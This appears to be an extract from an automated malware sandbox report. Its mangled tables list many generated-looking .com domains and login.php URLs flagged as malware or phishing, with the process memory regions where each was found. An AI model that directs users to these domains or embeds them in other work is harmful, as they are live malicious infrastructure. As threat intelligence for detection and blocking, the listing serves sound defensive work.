                                                                            unknownfalse
                                                                              high
                                                                              vofybic.com
                                                                              unknown
                                                                              unknownfalse
                                                                                high
                                                                                pujydag.com
                                                                                unknown
                                                                                unknownfalse
                                                                                  high
                                                                                  vojykom.com
                                                                                  unknown
                                                                                  unknownfalse
                                                                                    high
                                                                                    qetysuq.com
                                                                                    unknown
                                                                                    unknownfalse
                                                                                      high
                                                                                      vonyzut.com
                                                                                      unknown
                                                                                      unknownfalse
                                                                                        high
                                                                                        pufyjuq.com
                                                                                        unknown
                                                                                        unknownfalse
                                                                                          high
                                                                                          pujytug.com
                                                                                          unknown
                                                                                          unknownfalse
                                                                                            high
                                                                                            galyhiw.com
                                                                                            unknown
                                                                                            unknownfalse
                                                                                              high
                                                                                              lykygun.com
                                                                                              unknown
                                                                                              unknownfalse
                                                                                                high
                                                                                                vopymyc.com
                                                                                                unknown
                                                                                                unknownfalse
                                                                                                  high
                                                                                                  gatyfaz.com
                                                                                                  unknown
                                                                                                  unknownfalse
                                                                                                    high
                                                                                                    vojycit.com
                                                                                                    unknown
                                                                                                    unknownfalse
                                                                                                      high
                                                                                                      lyvymej.com
                                                                                                      unknown
                                                                                                      unknownfalse
                                                                                                        high
                                                                                                        lygyvar.com
                                                                                                        unknown
                                                                                                        unknownfalse
                                                                                                          high
                                                                                                          purygiv.com
                                                                                                          unknown
                                                                                                          unknownfalse
                                                                                                            high
                                                                                                            gahykeb.com
                                                                                                            unknown
                                                                                                            unknownfalse
                                                                                                              high
                                                                                                              purymog.com
                                                                                                              unknown
                                                                                                              unknownfalse
                                                                                                                high
                                                                                                                gadyzib.com
                                                                                                                unknown
                                                                                                                unknownfalse
                                                                                                                  high
                                                                                                                  ganyqow.com
                                                                                                                  unknown
                                                                                                                  unknownfalse
                                                                                                                    high
                                                                                                                    lyxysun.com
                                                                                                                    unknown
                                                                                                                    unknownfalse
                                                                                                                      high
                                                                                                                      puzyjyg.com
                                                                                                                      unknown
                                                                                                                      unknownfalse
                                                                                                                        high
                                                                                                                        vopydek.com
                                                                                                                        unknown
                                                                                                                        unknownfalse
                                                                                                                          high
                                                                                                                          qexyfuq.com
                                                                                                                          unknown
                                                                                                                          unknownfalse
                                                                                                                            high
                                                                                                                            gatykyh.com
                                                                                                                            unknown
                                                                                                                            unknownfalse
                                                                                                                              high
                                                                                                                              vocykem.com
                                                                                                                              unknown
                                                                                                                              unknownfalse
                                                                                                                                high
                                                                                                                                gahynus.com
                                                                                                                                unknown
                                                                                                                                unknownfalse
                                                                                                                                  high
                                                                                                                                  pumypop.com
                                                                                                                                  unknown
                                                                                                                                  unknownfalse
                                                                                                                                    high
                                                                                                                                    lyvysur.com
                                                                                                                                    unknown
                                                                                                                                    unknownfalse
                                                                                                                                      high
                                                                                                                                      galypob.com
                                                                                                                                      unknown
                                                                                                                                      unknownfalse
                                                                                                                                        high
                                                                                                                                        puzypav.com
                                                                                                                                        unknown
                                                                                                                                        unknownfalse
                                                                                                                                          high
                                                                                                                                          gacyqoz.com
                                                                                                                                          unknown
                                                                                                                                          unknownfalse
                                                                                                                                            high
                                                                                                                                            lykywid.com
                                                                                                                                            unknown
                                                                                                                                            unknownfalse
                                                                                                                                              high
                                                                                                                                              lykytin.com
                                                                                                                                              unknown
                                                                                                                                              unknownfalse
                                                                                                                                                high
                                                                                                                                                vofyref.com
                                                                                                                                                unknown
                                                                                                                                                unknownfalse
                                                                                                                                                  high
                                                                                                                                                  qekytig.com
                                                                                                                                                  unknown
                                                                                                                                                  unknownfalse
                                                                                                                                                    high
                                                                                                                                                    vocyzek.com
                                                                                                                                                    unknown
                                                                                                                                                    unknownfalse
                                                                                                                                                      high
                                                                                                                                                      puvypoq.com
                                                                                                                                                      unknown
                                                                                                                                                      unknownfalse
                                                                                                                                                        high
                                                                                                                                                        puvybeg.com
                                                                                                                                                        unknown
                                                                                                                                                        unknownfalse
                                                                                                                                                          high
                                                                                                                                                          pupydig.com
                                                                                                                                                          unknown
                                                                                                                                                          unknownfalse
                                                                                                                                                            high
                                                                                                                                                            pupyguq.com
                                                                                                                                                            unknown
                                                                                                                                                            unknownfalse
                                                                                                                                                              high
                                                                                                                                                              qedyqal.com
                                                                                                                                                              unknown
                                                                                                                                                              unknownfalse
                                                                                                                                                                high
                                                                                                                                                                vowymom.com
                                                                                                                                                                unknown
                                                                                                                                                                unknownfalse
                                                                                                                                                                  high
                                                                                                                                                                  purypol.com
                                                                                                                                                                  unknown
                                                                                                                                                                  unknownfalse
                                                                                                                                                                    high
                                                                                                                                                                    ganypeb.com
                                                                                                                                                                    unknown
                                                                                                                                                                    unknownfalse
Name | Malicious | Antivirus Detection | Reputation
http://ww16.vofycot.com/login.php?sub1=20241112-0450-397d-84b8-860db74cb63b | true | Avira URL Cloud: malware | unknown
https://puzylyp.com/login.php | true | Avira URL Cloud: malware | unknown
http://galyqaz.com/login.php | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://qeqyxov.com/login.phpsvchost.exe, 00000002.00000003.2397665900.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2414263063.00000000033CA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2388023341.0000000000852000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2425745567.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2184899677.00000000008E8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2386712444.00000000040EE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2422762232.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2207439218.00000000008E9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2388405607.00000000033C0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2387387248.00000000040F3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2178331950.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2185076169.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398171627.0000000000854000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513835440.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499628727.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2387081098.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000006.00000002.2604863482.00000000010D0000.00000004.00000020.00020000.00000000.sdmp, 
PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000006.00000002.2622033644.0000000008E29000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000006.00000002.2622033644.0000000008E90000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2718258067.0000000008D47000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2718258067.0000000008D8F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://vowyrif.com/login.phpsvchost.exe, 00000002.00000003.2346403174.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346603921.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2657780583.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347033417.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2649350353.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356885542.00000000092C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346691543.00000000092BE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356000937.00000000092BE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349309789.00000000092C7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://lymyvin.com/svchost.exe, 00000002.00000003.2329963433.0000000003319000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328865580.0000000003315000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329926664.0000000003317000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328162774.0000000003315000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://lyrywoj.com/login.phpsvchost.exe, 00000002.00000003.2397665900.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3418889094.000000000335E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3419128942.000000000336B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427392798.0000000009288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2925665962.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3278908147.000000000335C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2425745567.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2927397659.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2381728153.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2928746848.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3279511546.0000000003369000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2422762232.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2928459922.0000000003368000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427876534.00000000092B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://lyryman.com/login.phpsvchost.exe, 00000002.00000003.2726510414.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2360502034.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2746470521.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2746888339.0000000000854000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2358968663.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2358089375.00000000092C8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2829874698.000000000084D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2363422290.00000000092C2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2359102012.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2363692365.00000000092C2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2362592176.00000000092C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://vofypam.com/http://pujycyp.com/http://volydyk.com/http://pujycyp.com/http://qetyrul.com/http:svchost.exe, 00000002.00000003.2667584330.00000000040F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2666875773.00000000040F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://vocyruk.com/login.phpsvchost.exe, 00000002.00000003.2397665900.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2197741050.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2178331950.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2178415911.00000000033F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2197653218.0000000009298000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2185076169.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2388042380.00000000092C0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2202867008.0000000009299000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2387081098.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000006.00000002.2649196751.00000000091F7000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000006.00000002.2622033644.0000000008E20000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000003.2572564754.0000000000FB2000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2718258067.0000000008D8F000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2613849314.0000000000FB4000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2744689381.0000000009396000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 
00000007.00000003.2558068199.0000000008D9F000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000002.2671362092.00000000086C1000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000002.2608350004.00000000007DF000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000000B.00000002.2614917822.00000000014D8000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000000B.00000002.2745540362.0000000009360000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000000B.00000002.2614917822.00000000015A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: phishing
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://qexyfuq.com/login.phpsvchost.exe, 00000002.00000003.2678962210.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2693258532.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2672508299.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667608142.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667583572.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2665259102.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356885542.00000000092C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667040821.00000000040FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356000937.00000000092BE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://lyvysur.com/login.phpsvchost.exe, 00000002.00000003.2337886081.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329364841.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337007716.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2327922219.00000000092C0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2607855494.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2330522610.00000000092C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335731822.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2609571355.0000000003368000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://lyvymej.com/login.phpsvchost.exe, 00000002.00000003.2649333466.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2649350353.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347333934.0000000000851000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347614295.0000000000853000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://qebyqeq.com/login.phpsvchost.exe, 00000002.00000003.2649333466.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347333934.0000000000851000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347614295.0000000000853000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://vowypim.com/login.phpsvchost.exe, 00000002.00000003.2376137841.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2879404289.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2379940773.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2376002854.000000000923B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2896263867.0000000000854000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2884058737.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2375028226.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380116523.00000000033EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://lyryled.com/login.phpsvchost.exe, 00000002.00000003.2289346650.00000000008E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296615273.000000000337B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2289345179.00000000092B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://www.google.comt.4svchost.exe, 00000002.00000003.2376391418.0000000003342000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://vojygok.com/login.phpsvchost.exe, 00000002.00000003.2344956997.0000000003378000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2345061243.0000000003356000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2341852646.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2342419975.0000000003378000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2344054756.0000000003378000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://galydyw.com/login.phpsvchost.exe, 00000002.00000003.2678962210.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2693258532.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667608142.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356885542.00000000092C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667040821.00000000040FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356000937.00000000092BE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://lyryjir.com/login.phpsvchost.exe, 00000002.00000003.2513678339.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2511691560.0000000003325000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2310815345.0000000003368000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2530049232.000000000332A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2511442886.0000000003330000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2542956129.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513019694.0000000000851000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499635923.0000000000855000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499110020.0000000003378000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2511703150.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2511409546.0000000003323000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://qekysip.com/svchost.exe, 00000002.00000003.2498726255.000000000085D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2310938686.00000000092CF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2309738735.00000000092BB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2498955488.00000000040F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2507122526.00000000040F4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://ganyfuz.com/login.phpEsvchost.exe, 00000002.00000003.2726510414.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2746470521.00000000092B7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://lyxyxox.com/login.phpsvchost.exe, 00000002.00000003.2757808782.0000000003319000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2363891080.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2364207806.0000000000852000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://gahydyb.com/svchost.exe, 00000002.00000003.2347539212.0000000003309000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://pupygel.com/svchost.exe, 00000002.00000003.2329963433.0000000003319000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328865580.0000000003315000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329926664.0000000003317000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2546812858.00000000040F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328162774.0000000003315000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://puvygyv.com/login.phpsvchost.exe, 00000002.00000003.2397665900.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3419128942.000000000336B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427392798.0000000009288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2925665962.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2425745567.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2927397659.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2381728153.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2388806823.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2928746848.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3279511546.0000000003369000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2422762232.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2928459922.0000000003368000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427876534.00000000092B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://purymog.com/http://qegylul.com/http://lyryman.com/Psvchost.exe, 00000002.00000003.2359792353.000000000924A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2360483972.000000000924A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://lysyfyj.com/login.phpsvchost.exe, 00000002.00000003.2397665900.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2414263063.00000000033CA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2388023341.0000000000852000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2197741050.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2425745567.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2422762232.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2388405607.00000000033C0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2178331950.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398171627.0000000000854000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513835440.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499628727.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000006.00000002.2622033644.0000000008E90000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2718258067.0000000008D8F000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000003.2558068199.0000000008D9F000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000002.2671362092.00000000086C1000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000002.2671362092.0000000008682000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 
0000000B.00000002.2745540362.00000000093CD000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000013.00000002.2756051050.000000000914B000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000013.00000002.2756051050.0000000009104000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000015.00000002.2856769526.0000000008FC3000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000015.00000002.2875818807.00000000091AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              high
